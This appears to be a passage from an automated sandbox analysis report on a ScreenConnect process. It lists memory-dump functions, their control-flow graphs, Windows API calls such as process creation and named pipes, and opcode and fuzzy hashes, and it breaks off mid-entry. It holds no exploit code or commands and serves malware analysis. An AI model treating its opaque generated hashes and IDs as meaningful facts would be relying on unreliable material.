                                                                                    control_flow_graph 481 5cb01f0-5cb0241 482 5cb024c-5cb0250 481->482 483 5cb0243-5cb0249 481->483 484 5cb0258-5cb026d 482->484 485 5cb0252-5cb0255 482->485 483->482 486 5cb027b-5cb02d2 CreateProcessAsUserW 484->486 487 5cb026f-5cb0278 484->487 485->484 488 5cb02db-5cb0303 486->488 489 5cb02d4-5cb02da 486->489 487->486 489->488
                                                                                    APIs
                                                                                    • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 05CB02BF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3549234909.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5cb0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcessUser
                                                                                    • String ID: s4h
                                                                                    • API String ID: 2217836671-3799315901
                                                                                    • Opcode ID: adf994065d6cf926e171970e4101b83cdb7429dc321b9f2eae7622fc134b23ca
                                                                                    • Instruction ID: f09c4c774facea4843dc15b1bc1e63afe79e1df94af535954b702b5519327171
                                                                                    • Opcode Fuzzy Hash: adf994065d6cf926e171970e4101b83cdb7429dc321b9f2eae7622fc134b23ca
                                                                                    • Instruction Fuzzy Hash: 554155B6900249DFDF10CFA9C884ADEBBF1FF48320F14852AE918A7250D375AA55CF90
                                                                                    Function 060603C5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 131fileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 26 60603c5-60603cd 27 60603cf-606042c 26->27 28 606039c-60603b1 26->28 30 6060480-6060503 CreateFileA 27->30 31 606042e-6060453 27->31 51 60603b3 call 60603c5 28->51 52 60603b3 call 60603d0 28->52 39 6060505-606050b 30->39 40 606050c-606054a 30->40 31->30 35 6060455-6060457 31->35 34 60603b8-60603ba 36 606047a-606047d 35->36 37 6060459-6060463 35->37 36->30 41 6060467-6060476 37->41 42 6060465 37->42 39->40 47 606054c-6060550 40->47 48 606055a 40->48 41->41 43 6060478 41->43 42->41 43->36 47->48 49 6060552 47->49 50 606055b 48->50 49->48 50->50 51->34 52->34
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(?,?,?,?,?,00000001,00000004), ref: 060604ED
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3549629430.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_6060000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID: 4Ltq$s4h$s4h
                                                                                    • API String ID: 823142352-968180164
                                                                                    • Opcode ID: 54cade52c9e69bb797a1c953f3392bf3a304b082a7c14596bea68883ca3070e0
                                                                                    • Instruction ID: d1b26861e03cf56279b31d8b72ab25486983ea406e246078bb519b0ef1d4e6f7
                                                                                    • Opcode Fuzzy Hash: 54cade52c9e69bb797a1c953f3392bf3a304b082a7c14596bea68883ca3070e0
                                                                                    • Instruction Fuzzy Hash: 4B5168B1D40248DFDB60CFA9C945B9EBFF1FF48304F248529E849AB291D7B59844CB91
                                                                                    Function 060603D0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 116fileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 53 60603d0-606042c 54 6060480-6060503 CreateFileA 53->54 55 606042e-6060453 53->55 62 6060505-606050b 54->62 63 606050c-606054a 54->63 55->54 58 6060455-6060457 55->58 59 606047a-606047d 58->59 60 6060459-6060463 58->60 59->54 64 6060467-6060476 60->64 65 6060465 60->65 62->63 70 606054c-6060550 63->70 71 606055a 63->71 64->64 66 6060478 64->66 65->64 66->59 70->71 72 6060552 70->72 73 606055b 71->73 72->71 73->73
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(?,?,?,?,?,00000001,00000004), ref: 060604ED
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3549629430.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_6060000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID: 4Ltq$s4h$s4h
                                                                                    • API String ID: 823142352-968180164
                                                                                    • Opcode ID: e3bb086199b33f31a185afdbe5cb73cc655799d793a01236535b795baf0cea12
                                                                                    • Instruction ID: c8099523f56b4e39e50c424e4fc39a2516da63b027da807e2c28b3cec42e15b6
                                                                                    • Opcode Fuzzy Hash: e3bb086199b33f31a185afdbe5cb73cc655799d793a01236535b795baf0cea12
                                                                                    • Instruction Fuzzy Hash: E34144B1D402499FDB50CFAAC984B9EBFF2FB48304F248129E809AB251D7B59844CF91
                                                                                    Function 046131E0 Relevance: 6.5, Strings: 5, Instructions: 253COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 74 46131e0-461322d 78 46132a0-46132d5 74->78 79 461322f-4613296 call 4613549 74->79 86 46132d7-46132ed 78->86 87 4613318-461347e 78->87 101 461329e 79->101 92 46132f6-4613316 86->92 93 46132ef 86->93 126 4613487-4613545 87->126 92->87 93->92 101->78
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 4'tq$4'tq$4'tq$4'tq$4'tq
                                                                                    • API String ID: 0-254247153
                                                                                    • Opcode ID: efed9abeafafb66ff2d02e6f7c0e8fca6c6a9c6003b3dc13b9e1b6ed73ac419d
                                                                                    • Instruction ID: 63a0c229351128ce9eca4d8f90fbc15518079f7346f6f9d453064232ac63aae8
                                                                                    • Opcode Fuzzy Hash: efed9abeafafb66ff2d02e6f7c0e8fca6c6a9c6003b3dc13b9e1b6ed73ac419d
                                                                                    • Instruction Fuzzy Hash: FFA1B4706017069FD706EF79D45468EBBF2FF99304B008A5CD04AAF395EF70A9498B91
                                                                                    Function 04613230 Relevance: 6.5, Strings: 5, Instructions: 211COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 142 4613230-46132d5 call 4613549 155 46132d7-46132ed 142->155 156 4613318-461347e 142->156 159 46132f6-4613316 155->159 160 46132ef 155->160 190 4613487-4613545 156->190 159->156 160->159
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 4'tq$4'tq$4'tq$4'tq$4'tq
                                                                                    • API String ID: 0-254247153
                                                                                    • Opcode ID: 84b4eb2feeb68e2f8165c70803a5587058cfe18c328d4a2e7c223e1296bd6877
                                                                                    • Instruction ID: daa9643e0b40af4d238088818dd9d72bf06ee22bc55f44874e7b2305a36d1e33
                                                                                    • Opcode Fuzzy Hash: 84b4eb2feeb68e2f8165c70803a5587058cfe18c328d4a2e7c223e1296bd6877
                                                                                    • Instruction Fuzzy Hash: 978162706007069FD756EF79D45469EBBE2FF88304B008A2CD40AAF794EF70B9488B91
                                                                                    Function 06062B40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 91registryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 298 6062b40-6062bcb 304 6062bdc-6062bf4 298->304 305 6062bcd-6062bda 298->305 306 6062cb6-6062cbe 304->306 305->304 309 6062bf9-6062c28 RegDisablePredefinedCache 305->309 312 6062cbf 306->312 310 6062c31-6062c4c call 6062608 309->310 311 6062c2a-6062c30 309->311 316 6062c51-6062c6d 310->316 311->310 312->312 319 6062c6f 316->319 320 6062c78-6062cb4 316->320 319->320 320->306
                                                                                    APIs
                                                                                    • RegDisablePredefinedCache.ADVAPI32 ref: 06062C11
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3549629430.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_6060000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CacheDisablePredefined
                                                                                    • String ID: `Qtq$s4h
                                                                                    • API String ID: 1885667121-3363078372
                                                                                    • Opcode ID: d71c5800651c3d8408583f9012dc2ef10ddf2462d28607d18f8275b4afcfa878
                                                                                    • Instruction ID: 1f6852edc569d15afebe02c240b7e8ca2fac8f9b2a94f2318f64f42ae9f5ae9b
                                                                                    • Opcode Fuzzy Hash: d71c5800651c3d8408583f9012dc2ef10ddf2462d28607d18f8275b4afcfa878
                                                                                    • Instruction Fuzzy Hash: D4316570D002489FDB54DFAAD944B9EBFF5EF88310F148829E806AB390DB74A945CF90
                                                                                    Function 05CB17B1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71pipeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 322 5cb17b1-5cb17fa 324 5cb17fc-5cb17ff 322->324 325 5cb1802-5cb1867 CreateNamedPipeW 322->325 324->325 327 5cb1869-5cb186f 325->327 328 5cb1870-5cb1891 325->328 327->328
                                                                                    APIs
                                                                                    • CreateNamedPipeW.KERNEL32(00000000,?,?,?,?,?,00000001,00000004), ref: 05CB1854
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3549234909.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5cb0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateNamedPipe
                                                                                    • String ID: 4Ltq$s4h
                                                                                    • API String ID: 2489174969-3527615514
                                                                                    • Opcode ID: 078f06f94efd71e288ba9191c688c81a7e9596fd67894279cc4cf66a6d40ab5b
                                                                                    • Instruction ID: db5d922d144b54374a5aebfaf31a542e2226402459d713a3ae8d3e7ef8d1b6cd
                                                                                    • Opcode Fuzzy Hash: 078f06f94efd71e288ba9191c688c81a7e9596fd67894279cc4cf66a6d40ab5b
                                                                                    • Instruction Fuzzy Hash: D13124B5800248DFCB10CF9AD484ACEBFF5FF48314F188459E919AB221C376A955CF51
                                                                                    Function 05CB01E8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 95processCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 469 5cb01e8-5cb0241 471 5cb024c-5cb0250 469->471 472 5cb0243-5cb0249 469->472 473 5cb0258-5cb026d 471->473 474 5cb0252-5cb0255 471->474 472->471 475 5cb027b-5cb02d2 CreateProcessAsUserW 473->475 476 5cb026f-5cb0278 473->476 474->473 477 5cb02db-5cb0303 475->477 478 5cb02d4-5cb02da 475->478 476->475 478->477
                                                                                    APIs
                                                                                    • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 05CB02BF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3549234909.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5cb0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcessUser
                                                                                    • String ID: s4h
                                                                                    • API String ID: 2217836671-3799315901
                                                                                    • Opcode ID: c912280be1f33b43b8eb14f8d3a2ed992e9bc89b410942de10a4aa7afc65db81
                                                                                    • Instruction ID: 494899873ac4f84f9992e04488b271a62eebf20cd726dde9dba8dd95f20475b9
                                                                                    • Opcode Fuzzy Hash: c912280be1f33b43b8eb14f8d3a2ed992e9bc89b410942de10a4aa7afc65db81
                                                                                    • Instruction Fuzzy Hash: 84417776900209DFDF10CFA9C884ADEBBF1FF48310F04892AE918A7210D774AA55CF90
                                                                                    Function 05CB1E44 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66pipeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 492 5cb1e44-5cb1e4c 493 5cb1e68-5cb1ede ConnectNamedPipe 492->493 494 5cb1e4e-5cb1e61 492->494 496 5cb1ee0-5cb1ee6 493->496 497 5cb1ee7-5cb1f29 493->497 494->493 496->497 501 5cb1f2b 497->501 502 5cb1f33 497->502 501->502 503 5cb1f34 502->503 503->503
                                                                                    APIs
                                                                                    • ConnectNamedPipe.KERNEL32(00000000), ref: 05CB1EC8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3549234909.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5cb0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConnectNamedPipe
                                                                                    • String ID: s4h
                                                                                    • API String ID: 2191148154-3799315901
                                                                                    • Opcode ID: f6a427926dca63577882048bdea43d3e61a78f70af5b72aad8f1fd896639c7fc
                                                                                    • Instruction ID: a655ac1196097ed5b5509e892d118e958961a878c4528afe320f77f376ec6c1a
                                                                                    • Opcode Fuzzy Hash: f6a427926dca63577882048bdea43d3e61a78f70af5b72aad8f1fd896639c7fc
                                                                                    • Instruction Fuzzy Hash: 022143B4D00258DFDB24CFA9D594BDEBBF4AF08310F14846AE809AB350CBB59901CFA0
                                                                                    Function 05CB1E50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65pipeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 504 5cb1e50-5cb1ede ConnectNamedPipe 507 5cb1ee0-5cb1ee6 504->507 508 5cb1ee7-5cb1f29 504->508 507->508 512 5cb1f2b 508->512 513 5cb1f33 508->513 512->513 514 5cb1f34 513->514 514->514
                                                                                    APIs
                                                                                    • ConnectNamedPipe.KERNEL32(00000000), ref: 05CB1EC8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3549234909.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5cb0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConnectNamedPipe
                                                                                    • String ID: s4h
                                                                                    • API String ID: 2191148154-3799315901
                                                                                    • Opcode ID: e07ed48583a7e0e1b9632431d8ec19b9fcd7be65480ef1cbc4400cb08d857389
                                                                                    • Instruction ID: 6d1bca2e89a4b1dd73a97764d1348ab6e54e9c759033273806479bfc1cb30b14
                                                                                    • Opcode Fuzzy Hash: e07ed48583a7e0e1b9632431d8ec19b9fcd7be65480ef1cbc4400cb08d857389
                                                                                    • Instruction Fuzzy Hash: 192133B0D00258DFDB24CFAAD494BDEBBF4AF48310F148469E809AB350CBB59901CFA0
                                                                                    Function 05CB5B80 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59pipeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 515 5cb5b80-5cb5bc8 517 5cb5bca-5cb5bcd 515->517 518 5cb5bd0-5cb5c02 WaitNamedPipeW 515->518 517->518 519 5cb5c0b-5cb5c33 518->519 520 5cb5c04-5cb5c0a 518->520 520->519
                                                                                    APIs
                                                                                    • WaitNamedPipeW.KERNEL32(00000000), ref: 05CB5BEF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3549234909.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5cb0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: NamedPipeWait
                                                                                    • String ID: s4h
                                                                                    • API String ID: 3146367894-3799315901
                                                                                    • Opcode ID: 3c111d54eb50552297057918627fe2d09649999f804df59d3d284b707a05ed3c
                                                                                    • Instruction ID: 91de2895f86d7a47066b0d9d03e9d98d5ef61ffc2f6fcff2a7e13a05d9b3b113
                                                                                    • Opcode Fuzzy Hash: 3c111d54eb50552297057918627fe2d09649999f804df59d3d284b707a05ed3c
                                                                                    • Instruction Fuzzy Hash: C52127B6C002498FDB10CF9AD445AEEBBF4FB48324F14842ED859A7240D7B9A545CFA1
                                                                                    Function 05CB5B88 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56pipeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WaitNamedPipeW.KERNEL32(00000000), ref: 05CB5BEF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3549234909.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5cb0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: NamedPipeWait
                                                                                    • String ID: s4h
                                                                                    • API String ID: 3146367894-3799315901
                                                                                    • Opcode ID: 670d4e09c3f01718e57bac6c07dc106a5d3e8649f2bd0c09e0ebf1ae6a6816b5
                                                                                    • Instruction ID: fb48bbac8f8c7313daba418b270235f7830d6598568c99805b9d705cea8bef3e
                                                                                    • Opcode Fuzzy Hash: 670d4e09c3f01718e57bac6c07dc106a5d3e8649f2bd0c09e0ebf1ae6a6816b5
                                                                                    • Instruction Fuzzy Hash: 672106B6C002498FDB10CF9AC444BEEBBF5FB48324F14846DD459A7240D7B9A545CFA5
                                                                                    Function 04611900 Relevance: 1.6, Strings: 1, Instructions: 315COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: d
                                                                                    • API String ID: 0-2564639436
                                                                                    • Opcode ID: 7c05b95111db0090936a37b8673444406648a6241a0649fbce37061b937ff37b
                                                                                    • Instruction ID: a5f590b14f4cf1a66fb122281069213dd42787c22ace51052f0246e4aa2fe630
                                                                                    • Opcode Fuzzy Hash: 7c05b95111db0090936a37b8673444406648a6241a0649fbce37061b937ff37b
                                                                                    • Instruction Fuzzy Hash: 7AD14D74A10605CFCB08EF68C984A99B7B2FF5D310B158659E919AB365EB30FC85CF90
                                                                                    Function 04615508 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: c!
                                                                                    • API String ID: 0-3867720870
                                                                                    • Opcode ID: 64fae811d7535849e11d34550576c98f1b4e5fb793e0df3c40e348b30d40ea5b
                                                                                    • Instruction ID: a9f3b561c8aa4b2aa18f905a631a0b20184bab891d14c236051405b8839de2e6
                                                                                    • Opcode Fuzzy Hash: 64fae811d7535849e11d34550576c98f1b4e5fb793e0df3c40e348b30d40ea5b
                                                                                    • Instruction Fuzzy Hash: 7CB16170A01205AFDB05EF69D54459EBBF2EF88304B14C929E416AF368FF71EC468B91
                                                                                    Function 046118F0 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: d
                                                                                    • API String ID: 0-2564639436
                                                                                    • Opcode ID: 800d405239a5da493f9a2185992c710b40d582ea048799c6874c976bc234b153
                                                                                    • Instruction ID: 22b2f1caa1598d489da6c4c89f155b4ed5efd8720a0dfb71ed74e55d23d50d3b
                                                                                    • Opcode Fuzzy Hash: 800d405239a5da493f9a2185992c710b40d582ea048799c6874c976bc234b153
                                                                                    • Instruction Fuzzy Hash: 5CC10774A10605CFCB08DF68D984A99B7B2FF5D310B158699E909AB365EB30FC85CF90
                                                                                    Function 04611168 Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (&tq
                                                                                    • API String ID: 0-341024711
                                                                                    • Opcode ID: 845f7eef1294e8f033051f0a91275954da6a26476c10b180d4a32ca4271728b8
                                                                                    • Instruction ID: ebede8d4ca03074bfa9d1482828d2bd5f76e05afc84215a8ad27742ce029facd
                                                                                    • Opcode Fuzzy Hash: 845f7eef1294e8f033051f0a91275954da6a26476c10b180d4a32ca4271728b8
                                                                                    • Instruction Fuzzy Hash: BE519071F002198BDB15EFA9C4906EEBBF2AF99710F148119D406BB394EF34AD46CB91
                                                                                    Function 046128A1 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LRtq
                                                                                    • API String ID: 0-4092542751
                                                                                    • Opcode ID: a5d7278088c611813848149ce51aee05c039d9d2da1223f72988a20293f79ea3
                                                                                    • Instruction ID: 5ea8f1ac2cf6870ccd85f2bdd2a0e7eeaaae0e9c661a4b58d5b0f66e56807c55
                                                                                    • Opcode Fuzzy Hash: a5d7278088c611813848149ce51aee05c039d9d2da1223f72988a20293f79ea3
                                                                                    • Instruction Fuzzy Hash: 4221C671B041098BD7149BB5E4657ED7BB6FB8C321F188468E402B7364EB705842CB60
                                                                                    Function 04611630 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: s4h
                                                                                    • API String ID: 0-3799315901
                                                                                    • Opcode ID: c1b34374567bb6015505193a375292148860d2a7eb147336c2f39b6f41542117
                                                                                    • Instruction ID: bfc484d06d9e7367e66ef8d06bf91860e5428918bbe69ce54f602c83ef9cd2ca
                                                                                    • Opcode Fuzzy Hash: c1b34374567bb6015505193a375292148860d2a7eb147336c2f39b6f41542117
                                                                                    • Instruction Fuzzy Hash: 472148B6800249DFCF10CF9AC840ADEBBF1FB88320F188419E914A7210D379A551CFA1
                                                                                    Function 04610E48 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: s4h
                                                                                    • API String ID: 0-3799315901
                                                                                    • Opcode ID: d88a78f29269085f3bc552ac0bd03e488c6b11f898fdaabe806528bd9a4c8c2d
                                                                                    • Instruction ID: d10da093e309a2c34f14d6a6538bd99679f32615af2e353a25fff00d411a05da
                                                                                    • Opcode Fuzzy Hash: d88a78f29269085f3bc552ac0bd03e488c6b11f898fdaabe806528bd9a4c8c2d
                                                                                    • Instruction Fuzzy Hash: F62148B6900249DFDF10CF9AC844ADEBBF5FB48310F188419E914A7210D379A951DFE5
                                                                                    Function 046128B0 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LRtq
                                                                                    • API String ID: 0-4092542751
                                                                                    • Opcode ID: 33b109b4821e4b847f7950ecf4722497b4d2d5ea61aa456cfaf330cf41453392
                                                                                    • Instruction ID: e69eb7fc3de3f07f2badf2e73648555c91b33de990fcacb86b7decacdaa72c5d
                                                                                    • Opcode Fuzzy Hash: 33b109b4821e4b847f7950ecf4722497b4d2d5ea61aa456cfaf330cf41453392
                                                                                    • Instruction Fuzzy Hash: A5216630B042098BDB14DF76D5647EEBAF6BB8C721F189468E402B7394EB716C41CB90
                                                                                    Function 04614570 Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ^
                                                                                    • API String ID: 0-1590793086
                                                                                    • Opcode ID: 09cf488a67f92ebae7c7cd9262f8f111f617af75d8f4e68ab96e4acab8c70600
                                                                                    • Instruction ID: 0f6d46b4712dfe7e5d1a78ccfe034e390001763aaa5c83d270dd963702f6ec3a
                                                                                    • Opcode Fuzzy Hash: 09cf488a67f92ebae7c7cd9262f8f111f617af75d8f4e68ab96e4acab8c70600
                                                                                    • Instruction Fuzzy Hash: B3F017A420E3C15FE702AB24C9A0555BF719F47209F0E80C6D8C0DF2A7D9699A4AC761
                                                                                    Function 04613E4A Relevance: .2, Instructions: 211COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b64b3a325ea6ec5e4b209bc8041eaea8c36bd3ad3db33bea80da5a387ada664d
                                                                                    • Instruction ID: dfa74fd8cf3b7c7588a8675a37263ccbfd3b74adf8a2f0f7e6e2df5733aadfab
                                                                                    • Opcode Fuzzy Hash: b64b3a325ea6ec5e4b209bc8041eaea8c36bd3ad3db33bea80da5a387ada664d
                                                                                    • Instruction Fuzzy Hash: 3F717074B002068FDB15DFA9C45066EFBF6EFD9210B188529D41AAB364FE70FC428B91
                                                                                    Function 046168D8 Relevance: .2, Instructions: 204COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 198af2251eed417833ba3e9e7a2794df8a91b13c7caa2dd2c4a78abaf6c4f986
